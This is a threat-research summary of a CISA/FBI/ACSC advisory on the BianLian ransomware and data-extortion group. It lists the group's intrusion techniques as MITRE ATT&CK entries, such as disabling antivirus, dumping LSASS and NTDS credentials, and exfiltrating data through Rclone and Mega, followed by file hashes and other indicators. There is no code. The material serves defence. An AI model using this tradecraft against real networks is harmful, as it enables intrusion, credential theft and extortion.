Threat Research

#StopRansomware: BianLian Ransomware Group | CISA

Securonix

Two sentences summarizing: FBI, CISA, and ACSC describe BianLian ransomware and data-extortion group IOCs and TTPs identified through investigations as of March 2023, noting a shift from double-extortion to exfiltration-based extortion. The advisory covers initial access via RDP/phishing, backdoor and remote-access use, credential theft, data exfiltration methods, ransom notes, and mitigation guidance. #BianLian #FBI

Keypoints

  • BianLian is a ransomware developer/deployer and data extortion group active in U.S. critical infrastructure sectors since June 2022, with Australian targets as well.
  • Initial access primarily via compromised RDP credentials or phishing, enabling foothold in victim networks.
  • They deploy a custom backdoor (Go) and install remote-access tools (TeamViewer, Atera, SplashTop, AnyDesk) for persistence and C2.
  • Defense evasion includes PowerShell and Windows Shell usage to disable AMSI/antivirus and registry modifications to tamper protection.
  • Discovery and lateral movement leverage native Windows tools plus network scanners (Advanced Port Scanner, SoftPerfect) and domain enumeration (AD, trusts).
  • Exfiltration-focused extortion with FTP, Rclone, and Mega; encryption was used previously, but from Jan 2023 the group shifted to exfiltration-only extortion.
  • IOCs include specific file hashes (def.exe, encryptor.exe, exp.exe, system.exe) and ransom-note-related artifacts (Look at this instruction.txt).

MITRE Techniques

  • [T1587.001] Resource Development – Develop Capabilities: Malware – BianLian group actors developed a custom backdoor used in their intrusions. “Develop Capabilities: Malware”
  • [T1133] External Remote Services – BianLian group actors used RDP with valid accounts as a means of gaining initial access and for lateral movement. “External Remote Services”
  • [T1566] Phishing – BianLian group actors used phishing to obtain valid user credentials for initial access. “Phishing”
  • [T1078] Valid Accounts – BianLian group actors used RDP with valid accounts as a means of gaining initial access and for lateral movement. “Valid Accounts”
  • [T1059.001] Command and Scripting Interpreter: PowerShell – BianLian group actors used PowerShell to disable AMSI on Windows. “PowerShell”
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – BianLian group actors used Windows Command Shell to disable antivirus tools, for discovery, and to execute tools. “Windows Command Shell”
  • [T1053.005] Scheduled Task/Job: Scheduled Task – BianLian group actors used a Scheduled Task run as SYSTEM to execute a DLL daily. “Scheduled Task”
  • [T1098] Account Manipulation – BianLian group actors changed the password of an account they created. “Account Manipulation”
  • [T1136.001] Create Account: Local Account – BianLian group actors created/activated a local administrator account. “Create Account: Local Account”
  • [T1112] Modify Registry – BianLian group actors modified the registry to disable user authentication for RDP and to disable tamper protection for AV services. “Modify Registry”
  • [T1562.001] Impair Defenses: Disable or Modify Tools – BianLian group actors disabled Windows Defender/AMSI and tamper protection. “Impair Defenses: Disable or Modify Tools”
  • [T1562.004] Impair Defenses: Disable or Modify System Firewall – BianLian group actors added/modified firewall rules to allow RDP traffic. “Impair Defenses: Disable or Modify System Firewall”
  • [T1003.001] OS Credential Dumping: LSASS Memory – BianLian group actors accessed credential material stored in LSASS memory. “OS Credential Dumping: LSASS Memory”
  • [T1003.003] OS Credential Dumping: NTDS – BianLian group actors attempted to access/copy the AD database to steal credentials. “OS Credential Dumping: NTDS”
  • [T1552.001] Unsecured Credentials: Credentials In Files – BianLian group actors searched for insecurely stored credentials. “Unsecured Credentials: Credentials In Files”
  • [T1087.002] Domain Account – BianLian group actors queried domain accounts in Domain Admins and Domain Computers groups. “Domain Account”
  • [T1482] Domain Trust Discovery – BianLian group actors enumerated AD trusts to identify movement opportunities. “Domain Trust Discovery”
  • [T1083] File and Directory Discovery – BianLian group used system.exe to enumerate files. “File and Directory Discovery”
  • [T1046] Network Service Discovery – BianLian actors used port scanners to identify services/versions. “Network Service Discovery”
  • [T1135] Network Share Discovery – BianLian actors used tools to enumerate network shares. “Network Share Discovery”
  • [T1069.002] Permission Groups Discovery: Domain Groups – BianLian group actors identified domain groups. “Permission Groups Discovery: Domain Groups”
  • [T1012] Query Registry – BianLian group used system.exe to enumerate registry. “Query Registry”
  • [T1018] Remote System Discovery – BianLian group attempted to list other systems on the network. “Remote System Discovery”
  • [T1021.001] Remote Services: Remote Desktop Protocol – BianLian group used RDP for lateral movement. “Remote Desktop Protocol”
  • [T1115] Clipboard Data – BianLian group malware copies clipboard data. “Clipboard Data”
  • [T1105] Ingress Tool Transfer – BianLian group transferred tools/files from external system. “Ingress Tool Transfer”
  • [T1219] Remote Access Software – BianLian group used TeamViewer, Atera, SplashTop for interactive C2. “Remote Access Software”
  • [T1537] Transfer Data to Cloud Account – BianLian group used Rclone to exfiltrate data to cloud storage. “Transfer Data to Cloud Account”
  • [T1048] Exfiltration Over Unencrypted/FTP – BianLian group exfiltrated data via FTP. “Exfiltration Over Web Service: Exfiltration to Cloud Storage”
  • [T1567.002] Exfiltration Over Web Service: Exfiltration to Cloud Storage – BianLian group exfiltrated data via Mega public file-sharing service. “Exfiltration Over Web Service”
  • [T1486] Data Encrypted for Impact – BianLian group encrypted data on target systems (historical). “Data Encrypted for Impact”

Indicators of Compromise

  • [SHA-256 Hash] – def.exe – 7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900a09331325df893
  • [SHA-256 Hash] – encryptor.exe – 1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b75050da22e8e43
  • [SHA-256 Hash] – exp.exe – 0c1eb11de3a533689267ba075e49d93d55308525c04d6aff0d2c54d1f52f5500
  • [SHA-256 Hash] – system.exe – 40126ae71b857dd22db39611c25d3d5dd0e60316b72830e930fba9baf23973ce
  • [File name] – def.exe, encryptor.exe, exp.exe, system.exe – See Table 1 for IOCs
  • [File name] – Look at this instruction.txt – ransom note file
  • [URL] – https://qtox.github[.]io – Tox chat link cited in ransom note

Read more: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint